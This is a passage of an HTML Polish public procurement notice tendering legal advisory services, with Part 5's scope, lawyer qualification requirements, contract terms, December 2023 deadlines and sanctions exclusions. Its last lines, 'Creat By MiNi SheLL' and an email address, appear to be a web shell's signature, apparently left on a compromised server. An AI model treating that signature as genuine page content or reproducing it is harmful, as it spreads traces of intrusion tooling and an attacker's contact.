Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-01 do 2026-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zgodnie z SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Szczegółowy opis przedmiotu zamówienia dla części Nr 5 obejmuje w szczególności:<br/>a)	sporządzanie pisemnych opinii i analiz prawnych w oparciu o aktualne przepisy prawa zamówień publicznych, kodeksu cywilnego i przepisów wykonawczych do w/w ustaw (w tym również opiniowanie korespondencji sporządzanej na podstawie umów realizowanych przez Zamawiającego), przygotowanie wraz <br/>z jednostką zlecającą Zamawiającego pism związanych z realizacją umów, udzielaniem zamówień podobnych lub dodatkowych oraz z wzajemnymi roszczeniami stron umów zawartych przez Zamawiającego, na podstawie materiałów i dokumentów otrzymanych od Zamawiającego, w tym dokumentów, o które Wykonawca zgłosi się do Zamawiającego i jakie uzna za konieczne <br/>i właściwe w celu dokonania właściwej analizy i wydania opinii prawnej;<br/>b)	konsultacje ustne zagadnień wymagających analizy prawnej;<br/>c)	reprezentowanie Zamawiającego przed organami rozstrzygającymi spory <br/>w zakresie zamówień publicznych - w każdym przypadku wymagane będzie zawarcie odrębnej umowy;<br/>d)	przygotowywanie wraz z jednostką zlecającą Zamawiającego, sprawdzanie pod względem formalno-prawnym i parafowanie wszystkich projektów umów, aneksów, porozumień Zamawiającego, w tym umów z podwykonawcami Wykonawców realizujących umowy zawarte z Zamawiającym;<br/>e)	opiniowanie pisemne zasadności wprowadzania zmian do umów pod względem zgodności z obowiązującym prawem, przepisami wewnętrznymi Zamawiającego i zawartymi przez Zamawiającego umowami;<br/>f)	weryfikacja i analiza gwarancji bankowych i ubezpieczeniowych i innych form zabezpieczających należyte wykonanie umowy;<br/>g)	bieżące doradztwo w sprawach realizowanych w komórkach organizacyjnych Zamawiającego, w tym udzielanie pisemnych i ustnych opinii prawnych <br/>i interpretacji obowiązujących przepisów prawnych;<br/>h)	weryfikacja treści oraz akceptacja Specyfikacji Warunków Zamówienia przy użyciu kwalifikowanego podpisu elektronicznego (osoba skierowana przez wykonawcę do świadczenia usługi musi posiadać własny kwalifikowany podpis elektroniczny);<br/>i)	doradztwo prawne w zakresie oceny informacji stanowiących tajemnicę przedsiębiorstwa w prowadzonych przez Zamawiającego postępowaniach;<br/>j)	informowanie Zamawiającego o zmianach w przepisach prawnych i wyjaśnianie tych zmian i ich wpływu na funkcjonowanie jednostki organizacyjnej Zamawiającego;<br/>k)	doradztwo prawne, w oparciu o aktualne przepisy ustawy z dnia 6 września 2001 r. o dostępie do informacji publicznej, ustawy z dnia 10 maja 2018 r. o ochronie danych osobowych oraz innych aktów prawnych związanych z dostępem do informacji publicznej;<br/>l)	sprawdzanie pod względem formalno-prawnym i parafowanie umów z zakresu udostępniania gruntów pod inwestycje i ustanawiania służebności oraz zmian do w/w umów;<br/>m)	inne czynności niezbędne do należytego i prawidłowego wykonania przedmiotu zamówienia.<br/>2. Przedmiot zamówienia został dodatkowo opisany w projektowanych postanowieniach umowy, które stanowią załącznik Nr 5 do SWZ oraz w rozdziale III SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79111000-5 - Usługi w zakresie doradztwa prawnego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-01 do 2026-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zgodnie z SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Na podstawie art. 112 ustawy Pzp, zamawiający określa warunki udziału <br/>w postępowaniu dotyczące zdolności technicznej lub zawodowej. Wykonawca spełni warunek jeżeli wykaże, że spełnia minimalne warunki dotyczące kwalifikacji zawodowych osób skierowanych przez wykonawcę do realizacji zamówienia.<br/>Warunek dot. części Nr 1-4 zamówienia<br/>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że na czas realizacji zamówienia będzie dysponował osobami o odpowiednich kwalifikacjach zawodowych i doświadczeniu niezbędnych do wykonania zamówienia tj. co najmniej 1 osobą (jednak nie więcej niż 2 osoby) posiadającą następujące:<br/>1) Kwalifikacje zawodowe: osoba/osoby skierowana/skierowane przez wykonawcę do realizacji zamówienia musi/muszą posiadać uprawnienia do wykonywania zawodu radcy prawnego zgodnie z ustawą z dnia 6 lipca 1982 r. o radcach prawnych lub zawodu adwokata zgodnie z ustawą z dnia 26 maja 1982 r. prawo o adwokaturze, potwierdzone aktualnym wpisem na odpowiednią listę potwierdzającą wykonywanie zawodu radcy prawnego lub zawodu adwokata, <br/>2) Doświadczenie zawodowe:<br/>Osoba/osoby skierowana/skierowane przez wykonawcę do realizacji zamówienia musi/muszą posiadać następujące doświadczenie tj. co najmniej 36 miesięcy doświadczenia w świadczeniu stałej obsługi prawnej (zdobyte w ramach umowy/umów zakończonej/-ych lub będącej/-ych w trakcie realizacji, trwającej/-ych co najmniej 6 miesięcy) jako radca prawny lub adwokat na rzecz podmiotu stosującego przepisy ustawy z dnia 19 października 1991 r. o gospodarowaniu nieruchomościami rolnymi Skarbu Państwa lub ustawy z dnia 21 sierpnia 1997 r. o gospodarce nieruchomościami, w zakresie przepisów ustawy o gospodarowaniu nieruchomościami rolnymi Skarbu Państwa lub ustawy o gospodarce nieruchomościami).<br/>Warunek dot. części Nr 5 zamówienia<br/>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że na czas realizacji zamówienia będzie dysponował osobami o odpowiednich kwalifikacjach zawodowych i doświadczeniu niezbędnych do wykonania zamówienia tj. co najmniej 1 osobą (jednak nie więcej niż 2 osoby) posiadającą następujące:<br/>1) Kwalifikacje zawodowe: osoba/-y skierowana/-e przez wykonawcę do realizacji zamówienia musi/muszą posiadać uprawnienia radcy prawnego lub adwokata potwierdzone aktualnym wpisem odpowiednio na listę radców prawnych, o której mowa w ustawie z dnia 6 lipca 1982 roku o radcach prawnych lub na listę adwokatów, zgodnie z ustawą z dnia 26 maja 1982 roku prawo o adwokaturze, <br/>2) Doświadczenie zawodowe:<br/>Osoba/-y skierowana/-e przez wykonawcę do realizacji zamówienia musi/muszą posiadać następujące doświadczenie:<br/>a)	co najmniej 12 miesięcy doświadczenia zawodowego jako radca prawny lub adwokat, zdobytego w ramach umowy/umów (zakończonej/-ych lub będącej/-ych w trakcie realizacji, trwającej/-ych co najmniej 6 miesięcy) w okresie ostatnich 3 lat przed upływem terminu składania ofert, polegającego na świadczeniu obsługi prawnej jednostki zobowiązanej do stosowania ustawy Prawo zamówień publicznych, w zakresie prawa zamówień publicznych oraz<br/>b)	udział w charakterze pełnomocnika w co najmniej 1 (jednym) postępowaniu przed Krajową Izbą Odwoławczą w okresie ostatnich 5 lat przed upływem terminu składania ofert.<br/>Dot. części Nr 1-5 zamówienia<br/>Zamawiający zastrzega, że przy ocenie warunków udziału w postępowaniu okres doświadczenia osoby skierowanej do realizacji przedmiotu zamówienia, które zostało nabyte równolegle, nie podlega sumowaniu. Przez okres doświadczenia nabyty równolegle Zamawiający rozumie okres doświadczenia osoby skierowanej do realizacji przedmiotu zamówienia pokrywający się z innym wskazanym dla tej osoby okresem doświadczenia.<br/>Okres doświadczenia Wykonawca wskazuje w pełnych miesiącach, przy czym za miesiąc przyjmuje się 30 dni.<br/>Uwaga! Zgodnie z rozdziałem III ust. 11 SWZ Wykonawca może złożyć ofertę na każdą z części, z zastrzeżeniem, że do realizacji każdej części Wykonawca musi wyznaczyć co najmniej jedną osobę, nie więcej niż dwie osoby. Jeżeli Wykonawca składa ofertę na więcej niż jedną część zamówienia, do każdej części zamówienia Wykonawca musi wskazać inne osoby niż wskazane w pozostałej/pozostałych części/częściach zamówienia.<br/>Ocena na podstawie złożonych oświadczeń i dokumentów na zasadzie spełnia/nie spełnia). Wykonawca potwierdza spełnienie warunku poprzez złożenie dokumentu, o którym mowa w rozdziale V ust. 4 pkt 1 SWZ <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)	wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie obsługi prawnej, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - na potwierdzenie spełniania przez wykonawcę warunku udziału w postępowaniu, o którym mowa w Rozdziale IV ust. 6 SWZ. Wzór wykazu osób skierowanych do realizacji zamówienia stanowi odpowiednio załącznik Nr 3.1, 3.2, 3.3, 3.4 i 3.5 do SWZ dla części Nr 1, 2, 3, 4 i 5 zamówienia</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Nie dotyczy <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym mowa w Rozdziale V ust. 1 SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu<br/>2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty pełnomocnictwo do reprezentowania w postępowaniu wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>3. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane.<br/>W ww. przypadku, wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi, wykonają poszczególni wykonawcy. Wzór oświadczenia stanowi odpowiednio załącznik Nr 4.1, 4.2, 4.3, 4.4 i 4.5 do SWZ dla części Nr 1, 2, 3, 4 i 5 zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z § 5 PPU, które stanowią załącznik Nr 5 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-12-08 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi załącznikami należy złożyć za pośrednictwem platformy zakupowej dostępnej pod adresem https://kowr.eb2b.com.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-12-08 09:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-01-06</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Do oferty należy dołączyć: 1) Oświadczenie (wykonawcy / wykonawców wspólnie ubiegających się o udzielenie zamówienia) o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu, które stanowi odpowiednio załącznik Nr 2.1, 2.2, 2.3, 2.4 i 2.5 do SWZ dla części Nr 1, 2, 3, 4 i 5 zamówienia, 2) pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik, 3) pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>Ponadto zgodnie z ustawą z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (t.j. Dz.U. 2023 poz. 1497), z postępowania o<br/>udzielenie zamówienia wyklucza się̨:<br/>a) wykonawcę oraz uczestnika konkursu wymienionego w wykazach określonych w rozporządzeniu 765/2006 i<br/>rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o<br/>zastosowaniu środka, o którym mowa w art. 1 pkt 3 ww. ustawy, b) wykonawcę oraz uczestnika konkursu, którego<br/>beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy oraz<br/>finansowaniu terroryzmu (t.j. Dz. U. 2023 poz. 1124) jest osoba wymieniona w wykazach określonych w<br/>rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim<br/>beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu<br/>na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ww. ustawy,<br/>c) wykonawcę oraz uczestnika konkursu, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29<br/>września 1994 r. o rachunkowości (t.j. Dz. U. <br/>z 2023 r. poz. 120) jest podmiot wymieniony w wykazach<br/>określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką<br/>dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę<br/>rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ww. ustawy

Creat By MiNi SheLL
Email: jattceo@gmail.com